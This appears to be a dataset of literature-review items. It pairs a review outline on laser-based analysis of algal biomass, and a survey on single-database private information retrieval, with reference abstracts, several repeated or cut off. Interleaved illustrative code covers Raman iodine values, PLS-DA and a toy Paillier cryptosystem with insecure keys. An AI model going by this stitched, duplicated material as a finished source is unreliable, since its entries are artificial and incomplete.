the influence of environmental exposure and other cultivation and biological factors having an impact on them. Algae cells were suspended in liquid media or presented in a form of adherent cell mass on a surface (biofilm) and, consequently, characterized using their spectra. In our feasibility study we used three different experimental arrangements employing double-pulse LIBS technique in order to improve on analytical selectivity and sensitivity for potential industrial biotechnology applications, e.g. for monitoring of mass production of commercial biofuels, utilization in the food industry and control of the removal of heavy metal ions from industrial waste waters. --- paper_title: Comparison of green algae Cladophora sp. and Enteromorpha sp. as potential biomonitors of chemical elements in the southern Baltic. paper_content: The contents of Cd, Cu, Ni, Pb, Zn, Mn, K, Na, Ca and Mg were determined in the green algae Cladophora sp. from coastal and lagoonal waters of the southern Baltic. Factor analysis demonstrated spatial differences between concentration of chemical elements. The algae from the southern Baltic contained more Na and K while the anthropogenic impact of Cu, Pb and Zn was observed in the case of Cladophora sp. and Enteromorpha sp. from the Gulf of Gdansk at the vicinity of Gdynia. This area is exposed to emission of heavy metals from municipal and industrial sources with the main contribution of shipbuilding industry and seaport. The statistical evaluation of data has demonstrated that there exists a correlation between concentrations of Cu, Pb and Zn in both green algae collected at the same time and sampling sites of the Gulf of Gdansk. Our results show that in the case of absence of one species in the investigated area it is still possible to continue successfully the biomonitoring studies with its replacing by second one, i.e. Cladophora sp. by Enteromorpha sp. and vice versa; in consequence reliable results may be obtained. --- paper_title: INTERCOLONIAL VARIABILITY IN MACROMOLECULAR COMPOSITION IN P-STARVED AND P-REPLETE SCENEDESMUS POPULATIONS REVEALED BY INFRARED MICROSPECTROSCOPY(1). paper_content: Macromolecular variability in microalgal populations subject to different nutrient environments was investigated, using the chlorophyte alga Scenedesmus quadricauda (Turpin) Bréb. as a model organism. The large size of the four-cell coenobia in the strain used in this study (∼35 μm diameter) conveniently allowed high quality spectra to be obtained from individual coenobia using a laboratory-based Fourier transform infrared (FTIR) microscope with a conventional globar source of IR. By drawing sizable subpopulations of coenobia from two Scenedesmus cultures grown under either nutrient-replete or P-starved conditions, the population variability in macromolecular composition, and the effects of nutrient change upon this, could be estimated. On average, P-starved coenobia had higher carbohydrate and lower protein absorbance compared with P-replete coenobia. These parameters varied between coenobia with histograms of the ratio of absorbance of the largest protein and carbohydrate bands being Gaussian distributed. Distributions for the P-replete and P-starved subpopulations were nonoverlapping, with the difference in mean ratios for the two populations being statistically significant. Greater variance was observed in the P-starved subpopulation. 
In addition, multivariate models were developed using the spectral data, which could accurately predict the nutrient status of an independent individual coenobium, based on its FTIR spectrum. Partial least squares discriminant analysis (PLS-DA) was a better prediction method compared with soft independent modeling by class analogy (SIMCA). --- paper_title: Femtosecond time-resolved laser-induced breakdown spectroscopy for detection and identification of bacteria: A comparison to the nanosecond regime paper_content: Bacterial samples (Escherichia coli and Bacillus subtilis) have been analyzed by laser-induced breakdown spectroscopy (LIBS) using femtosecond pulses. We compare the obtained spectra with those resulting from the classical nanosecond LIBS. Specific features of femtosecond LIBS have been demonstrated, very attractive for analyzing biological sample: (i) a lower plasma temperature leading to negligible nitrogen and oxygen emissions from excited ambient air and a better contrast in detection of trace mineral species; and (ii) a specific ablation regime that favors intramolecular bonds emission with respect to atomic emission. A precise kinetic study of molecular band head intensities allows distinguishing the contribution of native CN bonds released by the sample from that due to carbon recombination with atmospheric nitrogen. Furthermore a sensitive detection of trace mineral elements provide specific spectral signature of different bacteria. An example is given for the Gram test provided by different magne... --- paper_title: Feasibility of Spectroscopic Characterization of Algal Lipids: Chemometric Correlation of NIR and FTIR Spectra with Exogenous Lipids in Algal Biomass paper_content: A large number of algal biofuels projects rely on a lipid screening technique for selecting a particular algal strain with which to work. We have developed a multivariate calibration model for predicting the levels of spiked neutral and polar lipids in microalgae, based on infrared (both near-infrared (NIR) and Fourier transform infrared (FTIR)) spectroscopy. The advantage of an infrared spectroscopic technique over traditional chemical methods is the direct, fast, and non-destructive nature of the screening method. This calibration model provides a fast and high-throughput method for determining lipid content, providing an alternative to laborious traditional wet chemical methods. We present data of a study based on nine levels of exogenous lipid spikes (between 1% and 3% (w/w)) of trilaurin as a triglyceride and phosphatidylcholine as a phospholipid model compound in lyophilized algal biomass. We used a chemometric approach to corrrelate the main spectral changes upon increasing phospholipid and triglyceride content in algal biomass collected from single species. A multivariate partial least squares (PLS) calibration model was built and improved upon with the addition of multiple species to the dataset. Our results show that NIR and FTIR spectra of biomass from four species can be used to accurately predict the levels of exogenously added lipids. It appears that the cross-species verification of the predictions is more accurate with the NIR models (R 2 = 0.969 and 0.951 and RMECV = 0.182 and 0.227% for trilaurin and phosphatidylcholine spike respectively), compared with FTIR (R 2 = 0.907 and 0.464 and RMECV = 0.302 and 0.767% for trilaurin and phosphatidylcholine spike, respectively). 
A fast high-throughput spectroscopic lipid fingerprinting method can be applied in a multitude of screening efforts that are ongoing in the microalgal research community. --- paper_title: The Use of Laser-Induced Breakdown Spectroscopy for Distinguishing between Bacterial Pathogen Species and Strains paper_content: Laser-induced breakdown spectroscopy (LIBS) was used in a blind study to successfully differentiate bacterial pathogens, both species and strain. The pathogens used for the study were chosen and prepared by one set of researchers. The LIBS data were collected and analyzed by another set of researchers. The latter researchers had no knowledge of the sample identities other than that (1) the first five of fifteen samples were unique (not replicates) and (2) the remaining ten samples consisted of two replicates of each of the first five samples. Using only chemometric analysis of the LIBS data, the ten replicate bacterial samples were successfully matched to each of the first five samples. The results of this blind study show it is possible to differentiate the bacterial pathogens Escherichia coli, three clonal methicillin-resistant Staphylococcus aureus (MRSA) strains, and one unrelated MRSA strain using LIBS. This is an important finding because it demonstrates that LIBS can be used to determine bacterial pathogen species within a defined sample set and can be used to differentiate between clonal relationships among strains of a single multiple-antibiotic-resistant bacterial species. Such a capability is important for the development of LIBS instruments for use in medical, water, and food safety applications. --- paper_title: A membrane basis for bacterial identification and discrimination using laser-induced breakdown spectroscopy paper_content: Nanosecond single-pulse laser-induced breakdown spectroscopy (LIBS) has been used to discriminate between two different genera of Gram-negative bacteria and between several strains of the Escherichia coli bacterium based on the relative concentration of trace inorganic elements in the bacteria. Of particular importance in all such studies to date has been the role of divalent cations, specifically Ca2+ and Mg2+, which are present in the membranes of Gram-negative bacteria and act to aggregate the highly polar lipopolysaccharide molecules. We have demonstrated that the source of emission from Ca and Mg atoms observed in LIBS plasmas from bacteria is at least partially located at the outer membrane by intentionally altering membrane biochemistry and correlating these changes with the observed changes in the LIBS spectra. The definitive assignment of some fraction of the LIBS emission to the outer membrane composition establishes a potential serological, or surface-antigen, basis for the laser-based identifi... --- paper_title: Spectral fingerprints of bacterial strains by laser-induced breakdown spectroscopy paper_content: Laser-induced breakdown spectroscopy (LIBS) is used to record the plasma emission for the colonies of vegetative cells or spores of five bacterial strains: Bacillus thuringiensis T34, Escherichia coli IHII/pHT315, Bacillus subtilis 168, Bacillus megaterium QM B1551, and Bacillus megaterium PV361. The major inorganic components of the bacterial samples, including Ca, Mn, K, Na, Fe, and phosphate, are clearly identified from the breakdown emission spectra. The bacterial spores accumulate a lot of calcium that shows strong LIBS emission at 393.7 and 396.9 nm. 
The diverse emissions from the phosphate component at 588.1 and 588.7 nm provide a fingerprint for bacterial strains. The relative change of inclusions in the bacteria is clearly distinguished by two-dimensional charts of the bacterial components. The results demonstrate the potential of the LIBS method for the rapid and low false-positive classification of bacteria with minimum sample preparation. --- paper_title: Application of laser-induced breakdown spectroscopy to the analysis of algal biomass for industrial biotechnology paper_content: Abstract We report on the application of laser-induced breakdown spectroscopy (LIBS) to the determination of elements distinctive in terms of their biological significance (such as potassium, magnesium, calcium, and sodium) and to the monitoring of accumulation of potentially toxic heavy metal ions in living microorganisms (algae), in order to trace e.g. the influence of environmental exposure and other cultivation and biological factors having an impact on them. Algae cells were suspended in liquid media or presented in a form of adherent cell mass on a surface (biofilm) and, consequently, characterized using their spectra. In our feasibility study we used three different experimental arrangements employing double-pulse LIBS technique in order to improve on analytical selectivity and sensitivity for potential industrial biotechnology applications, e.g. for monitoring of mass production of commercial biofuels, utilization in the food industry and control of the removal of heavy metal ions from industrial waste waters. --- paper_title: The Use of Laser-Induced Breakdown Spectroscopy for Distinguishing between Bacterial Pathogen Species and Strains paper_content: Laser-induced breakdown spectroscopy (LIBS) was used in a blind study to successfully differentiate bacterial pathogens, both species and strain. The pathogens used for the study were chosen and prepared by one set of researchers. The LIBS data were collected and analyzed by another set of researchers. The latter researchers had no knowledge of the sample identities other than that (1) the first five of fifteen samples were unique (not replicates) and (2) the remaining ten samples consisted of two replicates of each of the first five samples. Using only chemometric analysis of the LIBS data, the ten replicate bacterial samples were successfully matched to each of the first five samples. The results of this blind study show it is possible to differentiate the bacterial pathogens Escherichia coli, three clonal methicillin-resistant Staphylococcus aureus (MRSA) strains, and one unrelated MRSA strain using LIBS. This is an important finding because it demonstrates that LIBS can be used to determine bacterial pathogen species within a defined sample set and can be used to differentiate between clonal relationships among strains of a single multiple-antibiotic-resistant bacterial species. Such a capability is important for the development of LIBS instruments for use in medical, water, and food safety applications. ---
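Several of the Raman studies excerpted above reduce to the same quantitative step: the ratio of the 1656 cm−1 cis C=C stretching band to the 1445 cm−1 CH2 scissoring band is mapped through a calibration curve, built from pure fatty acids, onto an effective iodine value of the storage lipids. The sketch below illustrates that peak-ratio pipeline in outline only; the band windows, the crude straight-line baseline correction, and the calibration coefficients A_CAL and B_CAL are hypothetical placeholders, not values taken from the cited papers.

```python
# Illustrative sketch: effective iodine value of algal storage lipids from the
# I(1656 cm^-1) / I(1445 cm^-1) Raman band ratio, as described in the abstracts
# above.  A_CAL, B_CAL and the band windows are assumed demo values.
import numpy as np

A_CAL, B_CAL = 95.0, 4.0          # assumed linear calibration IV = A_CAL * R + B_CAL

def band_height(shift, intensity, center, half_width=15.0):
    """Peak height inside [center - hw, center + hw] after subtracting a straight
    baseline drawn between the window edges (a crude fluorescence correction)."""
    m = (shift >= center - half_width) & (shift <= center + half_width)
    x, y = shift[m], intensity[m]
    baseline = np.interp(x, [x[0], x[-1]], [y[0], y[-1]])
    return float(np.max(y - baseline))

def iodine_value(shift, intensity):
    """Effective iodine value from the unsaturation marker ratio R = I1656 / I1445."""
    r = band_height(shift, intensity, 1656.0) / band_height(shift, intensity, 1445.0)
    return A_CAL * r + B_CAL

# synthetic demo spectrum: two Gaussian bands on a sloping background
shift = np.linspace(800, 1800, 2000)
spec = (0.002 * shift                                  # sloping background
        + 1.0 * np.exp(-((shift - 1445) / 10) ** 2)    # CH2 scissoring band
        + 0.6 * np.exp(-((shift - 1656) / 10) ** 2))   # cis C=C stretching band
print(f"estimated iodine value: {iodine_value(shift, spec):.1f}")
```

In practice, band areas rather than heights, proper fluorescence-background removal, and the multivariate preprocessing and PLS models discussed in the pre-processing abstract would replace this single-ratio estimate.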
Title: Algal Biomass Analysis by Laser-Based Analytical Techniques—A Review
Section 1: Introduction
Description 1: Provide an overview of the importance of algal biomass as an alternative energy source and its potential in various applications, including biofuels, bioremediation, and industrial uses. Highlight the challenges and opportunities in algal biomass research.
Section 2: Laser-Induced Breakdown Spectroscopy
Description 2: Detail the principles, advantages, and applications of LIBS for elemental analysis of algal samples. Discuss the specific challenges and methodologies for improving LIBS sensitivity and accuracy.
Section 3: Laser-Induced Breakdown Spectroscopy of Liquid Samples
Description 3: Explain the techniques and approaches for conducting LIBS on liquid samples, particularly algal suspensions. Highlight the recent developments and improvements in this area.
Section 4: Laser-Induced Breakdown Spectroscopy for Molecular Analysis
Description 4: Discuss the capability of LIBS to detect molecular bands in plasma emissions, the applications of this technique, and the potential of combining LIBS with other spectroscopic methods for more comprehensive analyses.
Section 5: Laser Ablation Inductively Coupled Plasma Based Techniques
Description 5: Describe the use of LA-ICP-MS and LA-ICP-OES for algal biomass analysis, emphasizing the advantages, procedures, and specific applications in spatially-resolved elemental analysis.
Section 6: Raman Spectroscopy
Description 6: Provide an overview of Raman spectroscopy, its principles, applications, and the specific benefits of this technique for analyzing the biochemical composition and lipid content of algal cells. Mention the integration with optical tweezers for non-destructive in vivo analysis.
Section 7: Chemometrics for the Recognition of Algal Strains
Description 7: Introduce the role of chemometric algorithms in analyzing spectroscopic data from algal samples. Explain how these algorithms are used for qualitative and quantitative analysis and classification of algal strains.
Section 8: Discrimination of Four Algal Strains by LIBS
Description 8: Present a case study on using LIBS combined with chemometric algorithms to discriminate between different algal strains. Describe the methodology, results, and implications of this research.
Section 9: Conclusions and Future Prospects
Description 9: Summarize the key findings of the review, emphasizing the potential and limitations of laser-based techniques for algal biomass analysis. Discuss future research directions and technological advancements needed to overcome current challenges.
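Sections 7 and 8 of the outline above, like the pre-processing study excerpted earlier, rest on a chemometric classification step: spectra are normalised and fed to a discriminant model such as PLS-DA. The sketch below shows one common way to set that up, using synthetic stand-in spectra, an arbitrary component count, and scikit-learn's PLSRegression applied to one-hot class labels; none of the data or parameters come from the cited work.

```python
# Illustrative sketch of SNV preprocessing followed by PLS-DA classification,
# the kind of chemometric pipeline referred to above.  Synthetic demo data only.
import numpy as np
from sklearn.cross_decomposition import PLSRegression

def snv(X):
    """Standard Normal Variate: per-spectrum centering and scaling."""
    return (X - X.mean(axis=1, keepdims=True)) / X.std(axis=1, keepdims=True)

rng = np.random.default_rng(0)
# two synthetic classes (e.g. "replete" vs "starved"): 60 spectra, 500 channels
base = np.sin(np.linspace(0, 12, 500))
bump = np.exp(-np.linspace(-3, 3, 500) ** 2)
X = np.vstack([base + 0.05 * rng.standard_normal(500) + 0.3 * (k % 2) * bump
               for k in range(60)])
y = np.array([k % 2 for k in range(60)])

Y = np.eye(2)[y]                                   # one-hot targets turn PLS into PLS-DA
model = PLSRegression(n_components=3).fit(snv(X[:40]), Y[:40])
pred = model.predict(snv(X[40:])).argmax(axis=1)   # class = column with largest response
print("hold-out accuracy:", (pred == y[40:]).mean())
```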
A survey of single-database private information retrieval: techniques and applications
20
--- paper_title: Searchable symmetric encryption: Improved definitions and efficient constructions paper_content: Searchable symmetric encryption (SSE) allows a party to outsource the storage of his data to another party in a private manner, while maintaining the ability to selectively search over it. This problem has been the focus of active research and several security definitions and constructions have been proposed. In this paper we begin by reviewing existing notions of security and propose new and stronger security definitions. We then present two constructions that we show secure under our new definitions. Interestingly, in addition to satisfying stronger security guarantees, our constructions are more efficient than all previous constructions. Further, prior work on SSE only considered the setting where only the owner of the data is capable of submitting search queries. We consider the natural extension where an arbitrary group of parties other than the owner can submit search queries. We formally define SSE in this multi-user setting, and present an efficient construction. --- paper_title: Software protection and simulation on oblivious RAMs paper_content: Software protection is one of the most important issues concerning computer practice. There exist many heuristics and ad-hoc methods for protection, but the problem as a whole has not received the theoretical treatment it deserves. In this paper, we provide theoretical treatment of software protection. We reduce the problem of software protection to the problem of efficient simulation on oblivious RAM. A machine is oblivious if the sequence in which it accesses memory locations is equivalent for any two inputs with the same running time. For example, an oblivious Turing Machine is one for which the movement of the heads on the tapes is identical for each computation. (Thus, the movement is independent of the actual input.) What is the slowdown in the running time of a machine, if it is required to be oblivious? In 1979, Pippenger and Fischer showed how a two-tape oblivious Turing Machine can simulate, on-line, a one-tape Turing Machine, with a logarithmic slowdown in the running time. We show an analogous result for the random-access machine (RAM) model of computation. In particular, we show how to do an on-line simulation of an arbitrary RAM by a probabilistic oblivious RAM with a polylogarithmic slowdown in the running time. On the other hand, we show that a logarithmic slowdown is a lower bound. --- paper_title: Computationally private information retrieval with polylogarithmic communication paper_content: We present a single-database computationally private information retrieval scheme with polylogarithmic communication complexity. Our construction is based on a new, but reasonable intractability assumption, which we call the φ-Hiding Assumption (φHA): essentially the difficulty of deciding whether a small prime divides φ(m), where m is a composite integer of unknown factorization. --- paper_title: Replication is not needed: single database, computationally-private information retrieval paper_content: We establish the following, quite unexpected, result: replication of data for the computational private information retrieval problem is not necessary. More specifically, based on the quadratic residuosity assumption, we present a single database, computationally private information retrieval scheme with O(n^ε) communication complexity for any ε > 0.
--- paper_title: Single-Database Private Information Retrieval with Constant Communication Rate paper_content: We present a single-database private information retrieval (PIR) scheme with communication complexity ${\mathcal O}(k+d)$, where k ≥ log n is a security parameter that depends on the database size n and d is the bit-length of the retrieved database block. This communication complexity is better asymptotically than previous single-database PIR schemes. The scheme also gives improved performance for practical parameter settings whether the user is retrieving a single bit or very large blocks. For large blocks, our scheme achieves a constant "rate" (e.g., 0.2), even when the user-side communication is very low (e.g., two 1024-bit numbers). Our scheme and security analysis is presented using general groups with hidden smooth subgroups; the scheme can be instantiated using composite moduli, in which case the security of our scheme is based on a simple variant of the "Φ-hiding" assumption by Cachin, Micali and Stadler [2]. --- paper_title: Private information retrieval paper_content: We describe schemes that enable a user to access k replicated copies of a database (k ≥ 2) and privately retrieve information stored in the database. This means that each individual database gets no information on the identity of the item retrieved by the user. For a single database, achieving this type of privacy requires communicating the whole database, or n bits (where n is the number of bits in the database). Our schemes use the replication to gain substantial saving. In particular, we have: A two database scheme with communication complexity of O(n^{1/3}). A scheme for a constant number, k, of databases with communication complexity O(n^{1/k}). A scheme for (1/3)·log_2 n databases with polylogarithmic (in n) communication complexity. --- paper_title: A Generalisation, a Simplification and some Applications of Paillier's Probabilistic Public-Key System paper_content: We propose a generalisation of Paillier's probabilistic public key system, in which the expansion factor is reduced and which allows to adjust the block length of the scheme even after the public key has been fixed, without losing the homomorphic property. We show that the generalisation is as secure as Paillier's original system. We construct a threshold variant of the generalised scheme as well as zero-knowledge protocols to show that a given ciphertext encrypts one of a set of given plaintexts, and protocols to verify multiplicative relations on plaintexts. We then show how these building blocks can be used for applying the scheme to efficient electronic voting. This reduces dramatically the work needed to compute the final result of an election, compared to the previously best known schemes. We show how the basic scheme for a yes/no vote can be easily adapted to casting a vote for up to t out of L candidates. The same basic building blocks can also be adapted to provide receipt-free elections, under appropriate physical assumptions. The scheme for 1 out of L elections can be optimised such that for a certain range of parameter values, a ballot has size only O(log L) bits.
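The additive homomorphism that the Paillier generalisation in the last reference above preserves can be illustrated with a small toy implementation. The key size, helper names, and test values below are illustrative assumptions, and the Damgård-Jurik extension to a modulus n^{s+1} is not shown.

# Toy Paillier cryptosystem (insecure key size), illustrating E(a)*E(b) mod n^2 = E(a+b mod n).
import random
from math import gcd

p, q = 293, 433                 # illustrative small primes; real keys are far larger
n = p * q
n2 = n * n
g = n + 1                       # standard simplified generator
lam = (p - 1) * (q - 1) // gcd(p - 1, q - 1)   # lambda = lcm(p-1, q-1)

def L(u):
    return (u - 1) // n

mu = pow(L(pow(g, lam, n2)), -1, n)   # modular inverse (Python 3.8+)

def encrypt(m):
    while True:
        r = random.randrange(2, n)
        if gcd(r, n) == 1:
            break
    return (pow(g, m, n2) * pow(r, n, n2)) % n2

def decrypt(c):
    return (L(pow(c, lam, n2)) * mu) % n

a, b = 17, 25
ca, cb = encrypt(a), encrypt(b)
# Multiplying ciphertexts adds the plaintexts; exponentiation by a constant scales the plaintext.
assert decrypt((ca * cb) % n2) == (a + b) % n
assert decrypt(pow(ca, 3, n2)) == (3 * a) % n
print("homomorphic sum:", decrypt((ca * cb) % n2))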
--- paper_title: An oblivious transfer protocol with log-squared communication paper_content: We propose a one-round 1-out-of-n computationally-private information retrieval protocol for l-bit strings with low-degree polylogarithmic receiver-computation, linear sender-computation and communication Θ(k·log² n + l·log n), where k is a possibly non-constant security parameter. The new protocol is receiver-private if the underlying length-flexible additively homomorphic public-key cryptosystem is IND-CPA secure. It can be transformed to a one-round computationally receiver-private and information-theoretically sender-private 1-out-of-n oblivious-transfer protocol for l-bit strings, that has the same asymptotic communication and is private in the standard complexity-theoretic model. --- paper_title: Single Database Private Information Retrieval with Logarithmic Communication paper_content: We study the problem of single database private information retrieval, and present a solution with only logarithmic server-side communication complexity and a solution with only logarithmic user-side communication complexity. Previously the best result could only achieve polylogarithmic communication on each side, and was based on certain less well-studied assumptions in number theory [6]. On the contrary, our schemes are based on Paillier's cryptosystem [16], which along with its variants have drawn extensive studies in recent cryptographic researches [3, 4, 8, 9], and have many important applications [7, 8]. --- paper_title: One-way trapdoor permutations are sufficient for non-trivial single-server private information retrieval paper_content: We show that general one-way trapdoor permutations are sufficient to privately retrieve an entry from a database of size n with total communication complexity strictly less than n. More specifically, we present a protocol in which the user sends O(K²) bits and the server sends n - cn/K bits (for any constant c), where K is the security parameter of the trapdoor permutations. Thus, for sufficiently large databases (e.g., when K = n^ε for some small ε) our construction breaks the information-theoretic lower-bound (of at least n bits). This demonstrates the feasibility of basing single-server private information retrieval on general complexity assumptions. An important implication of our result is that we can implement a 1-out-of-n Oblivious Transfer protocol with communication complexity strictly less than n based on any one-way trapdoor permutation. --- paper_title: Batch codes and their applications paper_content: A batch code encodes a string x into an m-tuple of strings, called buckets, such that each batch of k bits from x can be decoded by reading at most one (more generally, t) bits from each bucket. Batch codes can be viewed as relaxing several combinatorial objects, including expanders and locally decodable codes. We initiate the study of these codes by presenting some constructions, connections with other problems, and lower bounds. We also demonstrate the usefulness of batch codes by presenting two types of applications: trading maximal load for storage in certain load-balancing scenarios, and amortizing the computational cost of private information retrieval (PIR) and related cryptographic protocols.
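The basic linear step that the Paillier-based and length-flexible schemes above iterate can be written as a one-line homomorphic selection; recursing over a multi-dimensional index is what brings the communication down toward (poly)logarithmic. A short LaTeX sketch, with notation chosen here for illustration rather than taken from the cited papers:

% Additively homomorphic selection of one database entry (illustrative notation).
% Entries x_1,...,x_n; the user wants x_{j*} and encrypts the indicator vector e_j = [j = j*].
\[
  c \;=\; \prod_{j=1}^{n} \mathrm{Enc}(e_j)^{\,x_j}
    \;=\; \mathrm{Enc}\!\Big(\sum_{j=1}^{n} e_j\, x_j\Big)
    \;=\; \mathrm{Enc}(x_{j^*}).
\]
% Sending the whole indicator vector costs n ciphertexts. Writing the index as
% (j_1,...,j_d) over a d-dimensional cube of side n^{1/d} and applying the selection once
% per dimension reduces the upload to d * n^{1/d} ciphertexts, which is roughly the shape
% of the log-squared communication bound quoted in the first reference above.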
--- paper_title: Replication is not needed: single database, computationally-private information retrieval paper_content: We establish the following, quite unexpected, result: replication of data for the computational private information retrieval problem is not necessary. More specifically, based on the quadratic residuosity assumption, we present a single database, computationally private information retrieval scheme with O(n/sup /spl epsiv//) communication complexity for any /spl epsiv/>0. --- paper_title: Single Database Private Information Retrieval Implies Oblivious Transfer paper_content: A Single-Database Private Information Retrieval (PIR) is a protocol that allows a user to privately retrieve from a database an entry with as small as possible communication complexity. We call a PIR protocol non-trivial if its total communication is strictly less than the size of the database. Non-trivial PIR is an important cryptographic primitive with many applications. Thus, understanding which assumptions are necessary for implementing such a primitive is an important task, although (so far) not a well-understood one. In this paper we show that any non-trivial PIR implies Oblivious Transfer, a far better understood primitive. Our result not only significantly clarifies our understanding of any non-trivial PIR protocol, but also yields the following consequences: - Any non-trivial PIR is complete for all two-party and multiparty secure computations. - There exists a communication-efficient reduction from any PIR protocol to a 1-out-of-n Oblivious Transfer protocol (also called SPIR). - There is strong evidence that the assumption of the existence of a one-way function is necessary but not sufficient for any non-trivial PIR protocol. --- paper_title: One-way trapdoor permutations are sufficient for non-trivial single-server private information retrieval paper_content: We show that general one-way trapdoor permutations are sufficient to privately retrieve an entry from a database of size n with total communication complexity strictly less than n. More specifically, we present a protocol in which the user sends O(K2) bits and the server sends n - cn/K bits (for any constant c), where K is the security parameter of the trapdoor permutations. Thus, for sufficiently large databases (e.g., when K = nƐ for some small Ɛ) our construction breaks the information-theoretic lower-bound (of at least n bits). This demonstrates the feasibility of basing single-server private information retrieval on general complexity assumptions. ::: ::: An important implication of our result is that we can implement a 1-out-of- n Oblivious Transfer protocol with communication complexity strictly less than n based on any one-way trapdoor permutation. --- paper_title: Private Searching on Streaming Data paper_content: In this paper we consider the problem of private searching on streaming data, where we can efficiently implement searching for documents that satisfy a secret criteria (such as the presence or absence of a hidden combination of hidden keywords) under various cryptographic assumptions. Our results can be viewed in a variety of ways: as a generalization of the notion of private information retrieval (to more general queries and to a streaming environment); as positive results on privacy-preserving datamining; and as a delegation of hidden program computation to other machines. 
--- paper_title: A Generalisation, a Simplification and some Applications of Paillier's Probabilistic Public-Key System paper_content: We propose a generalisation of Paillier's probabilistic public key system, in which the expansion factor is reduced and which allows to adjust the block length of the scheme even after the public key has been fixed, without losing the homomorphic property. We show that the generalisation is as secure as Paillier's original system. We construct a threshold variant of the generalised scheme as well as zero-knowledge protocols to show that a given ciphertext encrypts one of a set of given plaintexts, and protocols to verify multiplicative relations on plaintexts. We then show how these building blocks can be used for applying the scheme to efficient electronic voting. This reduces dramatically the work needed to compute the final result of an election, compared to the previously best known schemes. We show how the basic scheme for a yes/no vote can be easily adapted to casting a vote for up to t out of L candidates. The same basic building blocks can also be adapted to provide receipt-free elections, under appropriate physical assumptions. The scheme for 1 out of L elections can be optimised such that for a certain range of parameter values, a ballot has size only O(log L) bits. --- paper_title: Succinct Non-Interactive Zero-Knowledge Proofs with Preprocessing for LOGSNP paper_content: Let \Lambda : {0, 1}^n \times {0, 1}^m \to {0, 1} be a Boolean formula of size d, or more generally, an arithmetic circuit of degree d, known to both Alice and Bob, and let y \in {0, 1}^m be an input known only to Alice. Assume that Alice and Bob interacted in the past in a preamble phase (that is, applied a preamble protocol that depends only on the parameters, and not on \Lambda, y). We show that Alice can (non-interactively) commit to y, by a message of size poly(m, log d), and later on prove to Bob any N statements of the form \Lambda(x_1, y) = z_1, ..., \Lambda(x_N, y) = z_N by a (computationally sound) non-interactive zero-knowledge proof of size poly(d, log N). (Note the logarithmic dependence on N). We give many applications and motivations for this result. In particular, assuming that Alice and Bob applied in the past the (poly-logarithmic size) preamble protocol: 1. Given a CNF formula \Psi(w_1, ..., w_m) of size N, Alice can prove the satisfiability of \Psi by a (computationally sound) non-interactive zero-knowledge proof of size poly(m). That is, the size of the proof depends only on the size of the witness and not on the size of the formula. 2. Given a language L in the class LOGSNP and an input x \in {0, 1}^n, Alice can prove the membership x \in L by a (computationally sound) non-interactive zero-knowledge proof of size polylog n. 3. Alice can commit to a Boolean formula y of size m, by a message of size poly(m), and later on prove to Bob any N statements of the form y(x_1) = z_1, ..., y(x_N) = z_N by a (computationally sound) non-interactive zero-knowledge proof of size poly(m, log N). Our cryptographic assumptions include the existence of a poly-logarithmic Symmetric-Private-Information-Retrieval (SPIR) scheme, as defined in [4], and the existence of commitment schemes, secure against circuits of size exponential in the security parameter. --- paper_title: Software protection and simulation on oblivious RAMs paper_content: Software protection is one of the most important issues concerning computer practice.
There exist many heuristics and ad-hoc methods for protection, but the problem as a whole has not received the theoretical treatment it deserves. In this paper, we provide theoretical treatment of software protection. We reduce the problem of software protection to the problem of efficient simulation on oblivious RAM. A machine is oblivious if the sequence in which it accesses memory locations is equivalent for any two inputs with the same running time. For example, an oblivious Turing Machine is one for which the movement of the heads on the tapes is identical for each computation. (Thus, the movement is independent of the actual input.) What is the slowdown in the running time of a machine, if it is required to be oblivious? In 1979, Pippenger and Fischer showed how a two-tape oblivious Turing Machine can simulate, on-line, a one-tape Turing Machine, with a logarithmic slowdown in the running time. We show an analogous result for the random-access machine (RAM) model of computation. In particular, we show how to do an on-line simulation of an arbitrary RAM by a probabilistic oblivious RAM with a polylogarithmic slowdown in the running time. On the other hand, we show that a logarithmic slowdown is a lower bound. --- paper_title: On the Compressibility of NP Instances and Cryptographic Applications paper_content: We initiate the study of compression that preserves the solution to an instance of a problem rather than preserving the instance itself. Our focus is on the compressibility of NP decision problems. We consider NP problems that have long instances but relatively short witnesses. The question is, can one efficiently compress an instance and store a shorter representation that maintains the information of whether the original input is in the language or not. We want the length of the compressed instance to be polynomial in the length of the witness rather than the length of original input. Such compression enables to succinctly store instances until a future setting will allow solving them, either via a technological or algorithmic breakthrough or simply until enough time has elapsed. We give a new classification of NP with respect to compression. This classification forms a stratification of NP that we call the VC hierarchy. The hierarchy is based on a new type of reduction called W-reduction and there are compression-complete problems for each class. Our motivation for studying this issue stems from the vast cryptographic implications compressibility has. For example, we say that SAT is compressible if there exists a polynomial p(·, ·) so that given a formula consisting of m clauses over n variables it is possible to come up with an equivalent (w.r.t satisfiability) formula of size at most p(n, log m). Then given a compression algorithm for SAT we provide a construction of collision resistant hash functions from any one-way function. This task was shown to be impossible via black-box reductions (D. Simon, 1998), and indeed the construction presented is inherently non-black-box. Another application of SAT compressibility is a cryptanalytic result concerning the limitation of everlasting security in the bounded storage model when mixed with (time) complexity based cryptography. In addition, we study an approach to constructing an oblivious transfer protocol from any one-way function. This approach is based on compression for SAT that also has a property that we call witness retrievability.
However, we manage to prove severe limitations on the ability to achieve witness-retrievable compression of SAT. --- paper_title: Algebraic Lower Bounds for Computing on Encrypted Data paper_content: In cryptography, there has been tremendous success in building primitives out of homomorphic semantically-secure encryption schemes, using homomorphic properties in a black-box way. A few notable examples of such primitives include items like private information retrieval schemes and collision-resistant hash functions (e.g. [14, 6, 13]). In this paper, we illustrate a general methodology for determining what types of protocols can be implemented in this way and which cannot. This is accomplished by analyzing the computational power of various algebraic structures which are preserved by existing cryptosystems. More precisely, we demonstrate lower bounds for algebraically generating generalized characteristic vectors over certain algebraic structures, and subsequently we show how to directly apply these abstract algebraic results to put lower bounds on algebraic constructions of a number of cryptographic protocols, including PIR-writing and private keyword search protocols. We hope that this work will provide a simple "litmus test" of feasibility for use by other cryptographic researchers attempting to develop new protocols that require computation on encrypted data. Additionally, a precise mathematical language for reasoning about such problems is developed in this work, which may be of independent interest. --- paper_title: Replication is not needed: single database, computationally-private information retrieval paper_content: We establish the following, quite unexpected, result: replication of data for the computational private information retrieval problem is not necessary. More specifically, based on the quadratic residuosity assumption, we present a single database, computationally private information retrieval scheme with O(n^ε) communication complexity for any ε > 0. --- paper_title: An oblivious transfer protocol with log-squared communication paper_content: We propose a one-round 1-out-of-n computationally-private information retrieval protocol for l-bit strings with low-degree polylogarithmic receiver-computation, linear sender-computation and communication Θ(k·log² n + l·log n), where k is a possibly non-constant security parameter. The new protocol is receiver-private if the underlying length-flexible additively 